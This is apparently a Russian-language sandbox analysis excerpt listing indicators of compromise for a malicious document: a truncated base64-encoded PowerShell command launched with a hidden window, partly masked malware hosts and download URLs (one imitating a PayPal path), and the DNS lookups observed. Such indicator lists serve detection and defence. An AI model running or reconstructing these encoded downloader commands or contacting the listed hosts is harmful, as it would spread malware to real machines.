Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABVAHgAOABlADgAdQBpAD0AWwBjAGgAYQByAF0ANAAyADsAJABFAF8AbAA5ADgANQBkAD0AKAAnAEoAaQAnACsAJwA2AGgAJwArACgAJwBxAHcAJwArACcAbAAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1948
- %TEMP%\1046049.cvr
- 'co##.love':443
- 'za##da.info':80
- 'ro###tarcbd.com':80
- 'dh####afarms.com':443
- 'su########.creciendoconelarcoiris.com':443
- http://za##da.info/wp-admin/t4/
- http://ro###tarcbd.com/www.paypal.com/gqSFof/
- 'co##.love':443
- 'su########.creciendoconelarcoiris.com':443
- DNS ASK co##.love
- DNS ASK za##da.info
- DNS ASK ro###tarcbd.com
- DNS ASK dh####afarms.com
- DNS ASK sh###einfo.com
- DNS ASK sk###pit.com
- DNS ASK su########.creciendoconelarcoiris.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABVAHgAOABlADgAdQBpAD0AWwBjAGgAYQByAF0ANAAyADsAJABFAF8AbAA5ADgANQBkAD0AKAAnAEoAaQAnACsAJwA2AGgAJwArACgAJwBxAHcAJwArACcAbAAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAbQ...' (со скрытым окном)